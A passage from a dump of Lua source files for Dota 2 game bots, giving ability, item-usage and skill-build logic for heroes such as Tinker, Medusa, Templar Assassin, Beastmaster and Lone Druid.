"num_lines": 225,
"path": "/ability_item_usage_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_tinker\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal blinkDagger = npcBot:FindItemSlot(\"item_blink\")\n\tlocal travelBoots = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal currentGold = npcBot:GetGold()\n\tlocal activeMode = npcBot:GetActiveMode()\n\t\n\tlocal towerStatusTopRad = _G.GetTowerStatus(\"top\", TEAM_RADIANT)\n\tlocal towerStatusMidRad = _G.GetTowerStatus(\"mid\", TEAM_RADIANT)\n\tlocal towerStatusBotRad = _G.GetTowerStatus(\"bot\", TEAM_RADIANT)\n\tlocal towerStatusTopDir = _G.GetTowerStatus(\"top\", TEAM_DIRE)\n\tlocal towerStatusMidDir = _G.GetTowerStatus(\"mid\", TEAM_DIRE)\n\tlocal towerStatusBotDir = _G.GetTowerStatus(\"bot\", TEAM_DIRE)\n\t\n\tlocal creepLaneTopRad = _G.GetLaneCreepStatus(LANE_TOP, TEAM_RADIANT)\n\tlocal creepLaneMidRad = _G.GetLaneCreepStatus(LANE_MID, TEAM_RADIANT)\n\tlocal creepLaneBotRad = _G.GetLaneCreepStatus(LANE_BOT, TEAM_RADIANT)\n\tlocal creepLaneTopDir = _G.GetLaneCreepStatus(LANE_TOP, TEAM_DIRE)\n\tlocal creepLaneMidDir = _G.GetLaneCreepStatus(LANE_MID, TEAM_DIRE)\n\tlocal creepLaneBotDir = _G.GetLaneCreepStatus(LANE_BOT, TEAM_DIRE)\n\t\n\tlocal laser = npcBot:GetAbilityByName(\"tinker_laser\")\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal march = npcBot:GetAbilityByName(\"tinker_march_of_the_machines\")\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\")\n\t\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_ATTACK then\n \tlocal nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n \tlocal lowestHPCreep = nil\n \t\n \tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n \tlocal nearestEnemy = nil\n \t\n \tfor k,enemy in pairs(nearbyEnemies) do\n \t\tif nearestEnemy == nil then\n \t\t\tnearestEnemy = enemy\n \t\telse\n \t\t\tif GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n \t\t\t\tnearestEnemy = enemy\n \t\t\tend\n \t\tend\n \tend\n \t\n \tif not npcBot:IsChanneling() then\n \t\tif botMana >= (march:GetManaCost() + laser:GetManaCost()) and laser:IsFullyCastable() and nearestEnemy ~= nil then\n \t\t\tnpcBot:Action_UseAbilityOnEntity(laser, nearestEnemy)\n \t\tend\n \t\tif march:IsFullyCastable() and #nearbyCreeps >= 3 and activeMode ~= BOT_MODE_FARM then\n \t\t\tlocal marchLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearbyCreeps[1], 0.8)\n \t\t\tnpcBot:Action_UseAbilityOnLocation(march, _G.getAnglePoint(botLoc, marchLoc, 25))\n \t\tend\n \tend\n \t\n\t\t-- Use Missile if enemy nearby\n \tif not npcBot:IsChanneling() and missile ~= nil and missile:IsFullyCastable() and #nearbyEnemies > 0 then\n \t\tnpcBot:Action_UseAbility(missile)\n \tend\n end\nend\n\nfunction ItemUsageThink()\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif boots ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\n\tif botMana/botMaxMana < 0.4 and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\nend"
},
{
"alpha_fraction": 0.5483125448226929,
"alphanum_fraction": 0.5797503590583801,
"avg_line_length": 23.314607620239258,
"blob_id": "4bb55c631517a5611fa6450eac4ad375664a29d5",
"content_id": "45775bf261310a5a9d140d1fc4765bb218960eca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2163,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 89,
"path": "/item_build_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- wraith band --\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n \"item_branches\",\n \"item_faerie_fire\",\n \"item_boots\",\n \"item_sobi_mask\",\n \"item_ring_of_protection\",\n \"item_gloves\",\n \"item_belt_of_strength\",\n \"item_bottle\",\n \"item_blink\",\n -- Desolator\n \"item_mithril_hammer\",\n \"item_mithril_hammer\",\n \"item_blight_stone\",\n -- Black King Bar\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\",\n -- Wraith Band --\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n -- Force Staff --\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n -- Dragon Lance --\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\"\n}\n\nlocal refraction = \"templar_assassin_refraction\"\nlocal meld = \"templar_assassin_meld\"\nlocal psi = \"templar_assassin_psi_blades\"\nlocal psitrap = \"templar_assassin_psionic_trap\"\n\n--special_bonus_attack_speed_25\n--special_bonus_unique_templar_assassin_6\n--special_bonus_armor_7\n--special_bonus_unique_templar_assassin_3\n--special_bonus_unique_templar_assassin_4\n--special_bonus_unique_templar_assassin_2\n--special_bonus_unique_templar_assassin_5\n--special_bonus_unique_templar_assassin\n\nlocal t1 = \"special_bonus_attack_speed_25\"\nlocal t2 = \"special_bonus_unique_templar_assassin_3\"\nlocal t3 = \"special_bonus_unique_templar_assassin_4\"\nlocal t4 = \"special_bonus_unique_templar_assassin_5\"\n\nX[\"skills\"] = {\n psi, -- 1\n refraction, -- 2 \n refraction, -- 3\n psi, -- 4\n refraction, -- 5\n psitrap, -- 6\n refraction, -- 7\n meld, -- 8\n meld, -- 9\n t1, -- 10\n meld, -- 11 \n psitrap, -- 12\n meld, -- 13\n psi, -- 14\n t2, -- 15\n psi, -- 16 \n \"-1\", -- 17\n psitrap, -- 18\n \"-1\", -- 19\t\n t3, -- 20\n \"-1\", -- 21 \t\n \"-1\", -- 22\n \"-1\", -- 23\n \"-1\", -- 24\n t4 -- 25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.560490071773529,
"alphanum_fraction": 0.560490071773529,
"avg_line_length": 30.119047164916992,
"blob_id": "24b4b92132e1c356bb926bbbf0dcc6802c53f85a",
"content_id": "6717c05759854fd2202083bf33066e7b5ba85d1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1306,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 42,
"path": "/mode_evasive_maneuvers_generic.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction think()\n if npcBot:HasModifier(\"modifier_bloodseeker_rupture\") then\n -- if can bkb --\n local bkbSlot = npcBot:FindItemSlot(\"item_black_king_bar\")\n local bkb = nil\n if npcBot:GetItemSlotType(bkbSlot) == ITEM_SLOT_TYPE_MAIN then\n bkb = npcBot:GetItemInSlot(bkbSlot)\n end\n if bkb ~= nil then\n if bkb:IsFullyCastable() then\n npcBot:Action_UseAbility(bkb)\n end\n end\n\n -- if can BoT --\n local botSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n local boT = nil\n if npcBot:GetItemSlotType(botSlot) == ITEM_SLOT_TYPE_MAIN then\n boT = npcBot:GetItemInSlot(botSlot)\n end\n if boT ~= nil then\n if boT:IsFullyCastable() then\n npcBot:Action_UseAbility(boT)\n end\n end\n\n -- if can TP --\n local tpSlot = npcBot:FindItemSlot(\"item_tpscroll\")\n local tp = nil\n if npcBot:GetItemSlotType(tpSlot) == ITEM_SLOT_TYPE_MAIN then\n tp = npcBot:GetItemInSlot(tpSlot)\n end\n if tp ~= nil then\n if tp:IsFullyCastable() then\n npcBot:Action_UseAbility(tp)\n end\n end\n end\nend"
},
{
"alpha_fraction": 0.5027716159820557,
"alphanum_fraction": 0.5310420989990234,
"avg_line_length": 23.391891479492188,
"blob_id": "4b6b57f198baeca8db4ca2a6fbd1ed03afa6e7c9",
"content_id": "c71b0d07b8cb3495bbf60755e7dc38b696c5e204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1804,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 74,
"path": "/item_build_beastmaster.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_stout_shield\",\n \"item_tango\",\n \"item_flask\",\n \"item_clarity\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_quelling_blade\",\n \"item_boots\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_ring_of_regen\",\n \"item_recipe_soul_ring\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n \"item_sobi_mask\",\n \"item_belt_of_strength\",\n \"item_sobi_mask\",\n \"item_recipe_necronomicon\",\n \"item_recipe_necronomicon\",\n \"item_recipe_necronomicon\",\n \"item_blink\",\n \"item_platemail\",\n \"item_hyperstone\",\n \"item_chainmail\",\n \"item_recipe_assault\",\n \"item_ogre_axe\",\n \"item_staff_of_wizardry\",\n \"item_blade_of_alacrity\",\n \"item_point_booster\",\n \"item_gem\"\n}\n\nlocal wild_axes = \"beastmaster_wild_axes\"\nlocal call_of_the_wild = \"beastmaster_call_of_the_wild\"\nlocal inner_beast = \"beastmaster_inner_beast\"\nlocal primal_roar = \"beastmaster_primal_roar\"\n\nX[\"skills\"] = {\n wild_axes, --1\n inner_beast, --2 \n wild_axes, --1\n inner_beast, --4\n wild_axes, --5\n primal_roar, --6\n wild_axes, --7\n inner_beast, --8\n inner_beast, --9\n talents[2], --10\n call_of_the_wild, --11\n primal_roar, --12\n call_of_the_wild, --13\n call_of_the_wild, --14\n talents[3], --15\n call_of_the_wild, --16\n \"-1\", --17\n primal_roar, --18\n \"-1\", --19\n talents[6], --20\n \"-1\", \t --21\n \"-1\", \t --22\n \"-1\", --23\n \"-1\", --24\n talents[8] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.5729940533638,
"alphanum_fraction": 0.5822808146476746,
"avg_line_length": 37.74100875854492,
"blob_id": "1771e40a66700ba9f10977068fee06678f47bb1b",
"content_id": "8c6b96c86d53b5a1bfea9bc80cb3138f6a3e50ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5384,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 139,
"path": "/ability_item_usage_medusa.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_medusa\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local split_shot = npcBot:GetAbilityByName(\"medusa_split_shot\")\n local mystic_snake = npcBot:GetAbilityByName(\"medusa_mystic_snake\")\n local mana_shield = npcBot:GetAbilityByName(\"medusa_mana_shield\")\n local stone_gaze = npcBot:GetAbilityByName(\"medusa_stone_gaze\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\n -- Mana Shield think --\n cast = false\n if not npcBot:HasModifier(\"modifier_medusa_mana_shield\") then\n if #nearbyEnemies >= 1 then\n cast = true\n elseif botHealth < botMaxHealth*0.1 then\n cast = true\n elseif botHealth < botMaxHealth*0.7 and botMana > botMaxMana*0.7 then\n cast = true\n end\n if action_mode == BOT_MODE_LANING and botMana < mystic_snake:GetManaCost() then\n cast = false\n end\n else\n if #nearbyEnemies == 0 and botMana < botMaxMana*0.3 and botHealth > botMaxHealth*0.8 then\n cast = true\n end\n if action_mode == BOT_MODE_LANING and botMana < mystic_snake:GetManaCost() then\n cast = true\n end\n end\n if not npcBot:IsChanneling() and mana_shield:IsFullyCastable() and cast then\n npcBot:Action_UseAbility(mana_shield)\n end\n\n -- mystic_snake think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= BOT_ACTION_TYPE_MOVE_TO then\n if not npcBot:IsChanneling() then\n power_count = 0\n count = 0\n closest_unit = nil\n closest_distance = 10000\n if #nearbyEnemies > 0 then\n for j, enemy in pairs(nearbyEnemies) do\n power_count = power_count + 2\n count = count + 1\n if closest_unit == nil then\n closest_unit = enemy\n closest_distance = GetUnitToUnitDistance(npcBot, enemy)\n else\n distance = GetUnitToUnitDistance(npcBot, enemy)\n if distance < closest_distance then\n closest_distance = distance\n closest_unit = enemy\n end\n end\n end\n end\n if #nearbyCreeps > 0 then\n for j, creep in pairs(nearbyCreeps) do\n power_count = power_count + 1\n count = count + 1\n if closest_unit == nil then\n closest_unit = creep\n closest_distance = GetUnitToUnitDistance(npcBot, creep)\n else\n distance = GetUnitToUnitDistance(npcBot, creep)\n if distance < closest_distance then\n closest_distance = distance\n closest_unit = creep\n end\n end\n end\n end\n\n current_jump_amount = mystic_snake:GetLevel() + 2\n if power_count >= 4 and count <= current_jump_amount and mystic_snake:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(mystic_snake, closest_unit)\n end\n\n end\n end\n\n -- stone gaze think --\n if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_DEFEND_ALLY or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if #nearbyEnemies >= 2 then\n if not npcBot:IsChanneling() and stone_gaze:IsFullyCastable() then\n npcBot:Action_UseAbility(stone_gaze)\n end\n end\n end\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.744381308555603,
"alphanum_fraction": 0.7530254125595093,
"avg_line_length": 36.31797409057617,
"blob_id": "d9c1b426bea28b3df1ebdf95daa23507caa4f1ef",
"content_id": "9eacc2da12167e24c7eae25365d8dc6db2fb3976",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8098,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 217,
"path": "/ability_item_usage_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_lone_druid\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal spirit = npcBot:GetAbilityByName(\"lone_druid_spirit_bear\")\nlocal rabid = npcBot:GetAbilityByName(\"lone_druid_rabid\")\nlocal roar = npcBot:GetAbilityByName(\"lone_druid_savage_roar\")\nlocal form = npcBot:GetAbilityByName(\"lone_druid_true_form\")\n\nfunction BuybackUsageThink()\nend\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\n\t-- Recast bear if he's dead\n\tif (npcBot.bear == nil or not npcBot.bear:IsAlive()) and spirit:IsFullyCastable() then\n\t\tnpcBot:Action_UseAbility(spirit)\n\telseif npcBot.bear ~= nil and npcBot.bear:IsAlive() then\n\t\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\tlocal bearDist = GetUnitToUnitDistance(npcBot, npcBot.bear)\n\t\tlocal bearAction = npcBot.bear:GetCurrentActionType()\n\t\t\n\t\tif npcBot:GetItemSlotType(aghaSlot) ~= ITEM_SLOT_TYPE_MAIN and bearDist > 1000 and bearAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot.bear:Action_UseAbility(npcBot.bear.tele)\n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\tlocal midas = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal midasLoc = npcBot:FindItemSlot(\"item_hand_of_midas\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == 